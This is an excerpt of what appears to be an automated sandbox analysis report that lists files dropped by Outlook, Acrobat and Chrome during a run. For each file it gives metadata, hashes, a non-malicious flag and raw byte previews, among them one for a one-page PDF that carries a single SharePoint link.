                              Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"2ca80b1f29a688248c075079da283be2","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1714050967000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"135a4c00b06446ca9d8161b1b0d28cd0","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1372,"ts":1714050966000},{"id":"Edit_InApp_Aug2020","info":{"dg":"352d1aae71072646528ecfdada39c2f4","sid":"Edit_InApp_Aug2020"},"mimeType":"file","size":782,"ts":1714050966000},{"id":"DC_Reader_RHP_Banner","info":{"dg":"60bd09c68709710b3af579bee9868841","sid":"DC_Reader_RHP_Banner"},"mimeType":"file","size":1395,"ts":1714050966000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"c35a33deba7c60caccd8ec4e7bff001e","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1714050966000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"643b4ee7889bad1921de8d7d696e8f53","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","size":289,"ts":1714050966000},
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                              Category:dropped
                              Size (bytes):12288
                              Entropy (8bit):0.989087919427586
                              Encrypted:false
                              SSDEEP:
                              MD5:A8AF4C924878A38A656D38BB7728DED5
                              SHA1:8A4BA905ED010E078CB614DE97ED230910B9073F
                              SHA-256:F3101C4978BCF92A1A137FE9EF17167AA0E793D2DB4652613743EA35DA3DE4D9
                              SHA-512:675E635D31305473C6E4E8BF803D1C0616F2A7FC95FC559615A4CAEA6758E809B6F9739C366C716C13E533C9AC69A70AD0B99D7802C4CEFEDADE9E961C16E18B
                              Malicious:false
                              Reputation:unknown
                              Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:SQLite Rollback Journal
                              Category:dropped
                              Size (bytes):8720
                              Entropy (8bit):1.3462347444137963
                              Encrypted:false
                              SSDEEP:
                              MD5:918971111763E2F6E04A2BBC55B850F9
                              SHA1:666EB06064AD89B5E93300CDF302B798BDA84486
                              SHA-256:EE9E30C9BE89B356C19D322AACB8E5950B9364CAEB69AC05466E71EE2AA30987
                              SHA-512:6539EF4F02F53E31CAD98463FF5E0E21115988FE1AE4B3205EB1910E6B058D6C19AEDF6EDC6E1278C24B984D4DF79BC2DB3B981F0C6441B2E38C31C9D6BF7908
                              Malicious:false
                              Reputation:unknown
                              Preview:.... .c........W......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):231348
                              Entropy (8bit):4.3826919069429495
                              Encrypted:false
                              SSDEEP:
                              MD5:983445B2F314C91534824BB03A45F054
                              SHA1:9A4891BFAD13F1ABD2181F487A17FA82CCF65BE3
                              SHA-256:62EB85B872D9C2ED9D5F1C9B9D84C5DEF71994A8B4408BABAA87490222B73CEB
                              SHA-512:4A41A0DA026056EB8593CBF14AF58E584D113CFEC4F31A3916C39F33EA25F85C797CF0BD7EB42E32CEBC7677CE4CD6D8E4407D11281C55472D4772EB793F2986
                              Malicious:false
                              Reputation:unknown
                              Preview:TH02...... ..8..........SM01X...,....Q.............IPM.Activity...........h...............h............H..h|.o.....ab....h........pi..H..h\cal ...pDat...h.T..0....o....h.d.............h........_`.j...hUe..@...I.lw...h....H...8..j...0....T...............d.........2h...............k...l..........!h.............. hm9.......o...#h....8.........$hpi......8....."h`Q.......Q....'h..............1h.d..<.........0h....4....j../h....h......jH..hp?..p...|.o...-h .........o...+h.{.....p.o................. ..............F7..............FIPM.Activity....Form....Standard....Journal Entry...IPM.Microsoft.FolderDesign.FormsDescription................F.k..........1122110020000000.GwwMicrosoft...This form is used to create journal entries.........kf...... ..........&...........(.......(... ...@.....................................................................................................................fffffffff........wwwwwwww.p....pp..............p...............pw..............pw..DDDDO..
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):32768
                              Entropy (8bit):0.04563527678760173
                              Encrypted:false
                              SSDEEP:
                              MD5:1087E3B469D9625CE45180AD81EB854B
                              SHA1:D5D0029821B7A78A4472681D21407BDE6FBA364D
                              SHA-256:7C80E330E46589C1976B476D4E4B734777211588E8B134DEA118DBE9DE0F6AB1
                              SHA-512:ECD4E4E38A93F2DC1E75A4EEA6BCDFAF9FCB37E2B2EE9F38DFC3615D29B6CB63E06443E79BADE937308E43D8EB04FFDE90868732A51A29A9899CD816DD5EB8EE
                              Malicious:false
                              Reputation:unknown
                              Preview:..-.......................%.Xd..Y...:.6c.e....-.......................%.Xd..Y...:.6c.e..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                              File Type:SQLite Write-Ahead Log, version 3007000
                              Category:modified
                              Size (bytes):49472
                              Entropy (8bit):0.4848129791428379
                              Encrypted:false
                              SSDEEP:
                              MD5:3E7A64F8C381A36EEE41201799F8234E
                              SHA1:A1E801F53C57818807E6D8BF90715BEB7C14046B
                              SHA-256:1E84147C9A31A9DBFB485AB9DAB5B524740772C46704AC0B19B716CAD9C49EEA
                              SHA-512:8057AC12F07080ABDE5700B4D1D44FA306BE6DA88E631E083C1D4E0FFA05583FA20A208EC27F9DF047ACC945F29CC736777D0712915676112E6AFE00E353ACF8
                              Malicious:false
                              Reputation:unknown
                              Preview:7....-..........Y...:..r.l...........Y...:.J.>..w..SQLite format 3......@ .......................................................................... .............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                              File Type:PDF document, version 1.4, 1 pages
                              Category:dropped
                              Size (bytes):37369
                              Entropy (8bit):7.922352224493485
                              Encrypted:false
                              SSDEEP:
                              MD5:7C67D8ED0CC8C0D02887A8E27BF09F0D
                              SHA1:80FFCF002585B5F62170D0A4272E83FD477479F4
                              SHA-256:825FE4C5B3950D54D0C39C8EA91F6C66F3604B819559C35021D3075E169BDBE4
                              SHA-512:2F65DD6DBAE85D96E0061D683F10FD1EC448AEF69E9E306FCD49590DD9A4DA777F95460B78FD84E501CC67DCF573C168D071F7852928A0D41DEF53F648DBD982
                              Malicious:false
                              Reputation:unknown
                              Preview:%PDF-1.4.3 0 obj.<</Type /Page./Parent 1 0 R./MediaBox [0 0 612.00 792.00]./Resources 2 0 R./Annots [<</Type /Annot /Subtype /Link /Rect [179.72 452.57 288.47 425.74] /Border [0 0 0] /A <</S /URI /URI (https://netorgft3648903-my.sharepoint.com/:i:/g/personal/samantha_ever-eden_com/ETynNqAni0ZGvnNsfK8_gFUBLU0ujruoc4-tRd106qEydA?e=UCB3GP)>>>>]/Contents 4 0 R>>.endobj.4 0 obj.<</Filter /FlateDecode /Length 71>>.stream.x.3R..2.35W(.*T0P.R0T(..Y@....@QC=. P.A...J......1Tp.W.....+R@&...6f...endstream.endobj.1 0 obj.<</Type /Pages./Kids [3 0 R ]./Count 1./MediaBox [0 0 595.28 841.89].>>.endobj.5 0 obj.<</Filter /FlateDecode /Type /XObject./Subtype /Form./FormType 1./BBox [0.00 0.00 612.00 792.00]./Resources .<</ProcSet [/PDF /Text ]./Font 6 0 R.>>/Group <</Type/Group/S/Transparency>>./Length 668 >>.stream.x..T.n.1...W.V.a..K.r,P.(.C...=...hk'.A....^.IP$..!..5.... .....b.h..4...y.C....84'..$H.....}2Ly#`...h.i....86.Y........%.2.>..y..}brZ...R.+!.....-....!.=.".K. ..7.y.h;..0${...=....@"
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                              File Type:PDF document, version 1.4, 1 pages
                              Category:dropped
                              Size (bytes):0
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:
                              MD5:7C67D8ED0CC8C0D02887A8E27BF09F0D
                              SHA1:80FFCF002585B5F62170D0A4272E83FD477479F4
                              SHA-256:825FE4C5B3950D54D0C39C8EA91F6C66F3604B819559C35021D3075E169BDBE4
                              SHA-512:2F65DD6DBAE85D96E0061D683F10FD1EC448AEF69E9E306FCD49590DD9A4DA777F95460B78FD84E501CC67DCF573C168D071F7852928A0D41DEF53F648DBD982
                              Malicious:false
                              Reputation:unknown
                              Preview:%PDF-1.4.3 0 obj.<</Type /Page./Parent 1 0 R./MediaBox [0 0 612.00 792.00]./Resources 2 0 R./Annots [<</Type /Annot /Subtype /Link /Rect [179.72 452.57 288.47 425.74] /Border [0 0 0] /A <</S /URI /URI (https://netorgft3648903-my.sharepoint.com/:i:/g/personal/samantha_ever-eden_com/ETynNqAni0ZGvnNsfK8_gFUBLU0ujruoc4-tRd106qEydA?e=UCB3GP)>>>>]/Contents 4 0 R>>.endobj.4 0 obj.<</Filter /FlateDecode /Length 71>>.stream.x.3R..2.35W(.*T0P.R0T(..Y@....@QC=. P.A...J......1Tp.W.....+R@&...6f...endstream.endobj.1 0 obj.<</Type /Pages./Kids [3 0 R ]./Count 1./MediaBox [0 0 595.28 841.89].>>.endobj.5 0 obj.<</Filter /FlateDecode /Type /XObject./Subtype /Form./FormType 1./BBox [0.00 0.00 612.00 792.00]./Resources .<</ProcSet [/PDF /Text ]./Font 6 0 R.>>/Group <</Type/Group/S/Transparency>>./Length 668 >>.stream.x..T.n.1...W.V.a..K.r,P.(.C...=...hk'.A....^.IP$..!..5.... .....b.h..4...y.C....84'..$H.....}2Ly#`...h.i....86.Y........%.2.>..y..}brZ...R.+!.....-....!.=.".K. ..7.y.h;..0${...=....@"
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:
                              MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                              SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                              SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                              SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                              Malicious:false
                              Reputation:unknown
                              Preview:[ZoneTransfer]..ZoneId=3..
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                              File Type:ASCII text, with very long lines (28764), with CRLF line terminators
                              Category:dropped
                              Size (bytes):20971520
                              Entropy (8bit):0.159405471298666
                              Encrypted:false
                              SSDEEP:
                              MD5:75F02FC57C1A9E28E8A221DB5DFC9D1F
                              SHA1:1B6CE7F569D7F30795FC744AC9C90B32A1112341
                              SHA-256:99B176B79AA12931650515355FA2E4E2514DE7B5D6E6118D57A80DD79B9D39F0
                              SHA-512:F3F1DD6B9A7576A3264588DB14CE3A40CECDDF8689C13E5F6B9C0BB4167BB332CE8C2DCAC30175493421D50F66DA9ECF1F36CA18555D072F4446493F24A8A44F
                              Malicious:false
                              Reputation:unknown
                              Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..04/25/2024 13:15:49.819.OUTLOOK (0x1B40).0x1B44.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.GDIAssistant.HandleCallback","Flags":30962256044949761,"InternalSequenceNumber":26,"Time":"2024-04-25T13:15:49.819Z","Contract":"Office.System.Activity","Activity.CV":"TT3vkgKxXEa3vkEo+hGSSw.4.11","Activity.Duration":11,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.GdiFamilyName":"","Data.CloudFontStatus":6,"Data.CloudFontTypes":256}...04/25/2024 13:15:49.835.OUTLOOK (0x1B40).0x1B44.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.ResourceClient.Deserialize","Flags":30962256044949761,"InternalSequenceNumber":28,"Time":"2024-04-25T13:15:49.835Z","Contract":"Office.System.Activity","Activity.CV":"TT3vkgKxXEa3vkEo+hGSSw.4.12","Activity.Duration":12565,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.JsonFileMajor
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):20971520
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:
                              MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                              SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                              SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                              SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                              Malicious:false
                              Reputation:unknown
                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):246
                              Entropy (8bit):3.5309417490522437
                              Encrypted:false
                              SSDEEP:
                              MD5:A52D6D1C4FD0A8B511136BB42B08FBB1
                              SHA1:EF2C4A5AC6E12905BF503E546A4323E88EA264C9
                              SHA-256:463B49D71144A1820721F944DDFCC0AAF8E75096DBC08C06EA750D2888328DC9
                              SHA-512:1709CAA2A28BDE153163DED92B471CA04EAFFF447D2C75DEDF1B7B671C8391C96A94521E679A4557A7ECBCEF9398342C2C5B6FC430B2A9FD125E0CCCF13D3909
                              Malicious:false
                              Reputation:unknown
                              Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.5./.0.4./.2.0.2.4. . .1.5.:.1.6.:.0.9. .=.=.=.....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                              File Type:data
                              Category:modified
                              Size (bytes):106496
                              Entropy (8bit):4.482137342103403
                              Encrypted:false
                              SSDEEP:
                              MD5:50F0CF9301946942DA7B6D07396F12D5
                              SHA1:3F251193E550A7FF04179271E02480003BE0CB9C
                              SHA-256:9845F246EA6EEDCA1D7C8937A45F28A40B36DBFE427D76068A72E4127CB5FCB5
                              SHA-512:C43ABDFEC55D1A7FAF17FC139FEBADDC347DAEEB169E714E2834125B0B52763D2696CE07431CB82B0B381E68F6D1ACCD14DFECDCD2B20728402CB9B480CAD18E
                              Malicious:false
                              Reputation:unknown
                              Preview:............................................................................`...D...@...S.......................eJ..............Zb..2.......................................@.t.z.r.e.s...d.l.l.,.-.3.2.2.......................................................@.t.z.r.e.s...d.l.l.,.-.3.2.1............................................................c.Y..........S...............v.2._.O.U.T.L.O.O.K.:.1.b.4.0.:.5.c.9.a.1.b.e.f.5.4.f.e.4.5.5.5.a.a.6.6.9.8.3.0.0.a.8.c.0.d.e.b...C.:.\.U.s.e.r.s.\.c.a.l.i.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.u.t.l.o.o.k. .L.o.g.g.i.n.g.\.O.U.T.L.O.O.K._.1.6._.0._.1.6.8.2.7._.2.0.1.3.0.-.2.0.2.4.0.4.2.5.T.1.5.1.5.4.9.0.5.4.8.-.6.9.7.6...e.t.l.......P.P.D...@...S...............................................................................................................................................................................................................................................................................................................
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:ASCII text, with very long lines (393)
                              Category:dropped
                              Size (bytes):16525
                              Entropy (8bit):5.353642815103214
                              Encrypted:false
                              SSDEEP:
                              MD5:91F06491552FC977E9E8AF47786EE7C1
                              SHA1:8FEB27904897FFCC2BE1A985D479D7F75F11CEFC
                              SHA-256:06582F9F48220653B0CB355A53A9B145DA049C536D00095C57FCB3E941BA90BB
                              SHA-512:A63E6E0D25B88EBB6602885AB8E91167D37267B24516A11F7492F48876D3DDCAE44FFC386E146F3CF6EB4FA6AF251602143F254687B17FCFE6F00783095C5082
                              Malicious:false
                              Reputation:unknown
                              Preview:SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig:
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):29752
                              Entropy (8bit):5.418832416388237
                              Encrypted:false
                              SSDEEP:
                              MD5:3F097B266E163FBA3EA2F02D99895709
                              SHA1:46D5845D0FDCE1885B9F3299DDA1BAE85BB6ECC8
                              SHA-256:3898B870D18F4D3C8BFEA04C3574583B9A4086557A4402331587526FC86A00A6
                              SHA-512:CD65D4AB90C7C1A5F36D4CFB2278F5497C56C3BFE0BED30D508F606D78C7A62458C8D97B74DD46C14C001E284EC4487E4BBAEA26F482609C586858BD79A5389E
                              Malicious:false
                              Reputation:unknown
                              Preview:06-10-2023 10:08:42:.---2---..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Starting NGL..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..06-10-2023 10:08:42:.Closing File..06-10-
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                              Category:dropped
                              Size (bytes):758601
                              Entropy (8bit):7.98639316555857
                              Encrypted:false
                              SSDEEP:
                              MD5:3A49135134665364308390AC398006F1
                              SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                              SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                              SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                              Malicious:false
                              Reputation:unknown
                              Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                              Category:dropped
                              Size (bytes):1407294
                              Entropy (8bit):7.97605879016224
                              Encrypted:false
                              SSDEEP:
                              MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                              SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                              SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                              SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                              Malicious:false
                              Reputation:unknown
                              Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                              Category:dropped
                              Size (bytes):1419751
                              Entropy (8bit):7.976496077007677
                              Encrypted:false
                              SSDEEP:
                              MD5:1A39CAAE4C5F8AD2A98F0756FFCBA562
                              SHA1:279F2B503A0B10E257674D31532B01EA7DE0473F
                              SHA-256:57D198C7BDB9B002B8C9C1E1CCFABFE81C00FE0A1E30A237196A7C133237AA95
                              SHA-512:73D083E92FB59C92049AF8DC31A0AA2F38755453FFB161D18A1C4244747EE88B7A850F7951FC10F842AE65F6CC8F6164231DB6261777EC5379B337CB379BEF99
                              Malicious:false
                              Reputation:unknown
                              Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                              Category:dropped
                              Size (bytes):386528
                              Entropy (8bit):7.9736851559892425
                              Encrypted:false
                              SSDEEP:
                              MD5:5C48B0AD2FEF800949466AE872E1F1E2
                              SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                              SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                              SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                              Malicious:false
                              Reputation:unknown
                              Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):30
                              Entropy (8bit):1.2389205950315936
                              Encrypted:false
                              SSDEEP:
                              MD5:94084AF52151F70354623AE0BA08FD87
                              SHA1:6987A9E6072D4F90B268D74BA10930188D7073FA
                              SHA-256:2BA0B5C09F07DFCC1EE76BD1142CA6C9032327816C7022FEE958A9432DDEB7C9
                              SHA-512:B0FB4C5E86281CFEAAB5D6631553C49E47BA80D8BB00E666D658240E6B46C3FD4E30FAEC9E59D42881407535D14B5481B469E66CAFDA438B7D8B438A45BE2FB4
                              Malicious:false
                              Reputation:unknown
                              Preview:..............................
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 12:16:27 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2673
                              Entropy (8bit):3.9857594595793966
                              Encrypted:false
                              SSDEEP:
                              MD5:657C97E76B27FF879F9FEAE77C037AC0
                              SHA1:D3A45AAF3983DB2B24A9BDE7B408391812EC12C7
                              SHA-256:1B60313B8E4B02172D06D49A23DE18AADB9DF36C367801DCEB77DC8DA1F1C206
                              SHA-512:46F0E47F5E56AC1D78B969814D54052E913B19F22C55B0FE9779D8FDC512C64A9436BEB79C63456E7497337289E284F7907A195A5986806695BE088B1259AA32
                              Malicious:false
                              Reputation:unknown
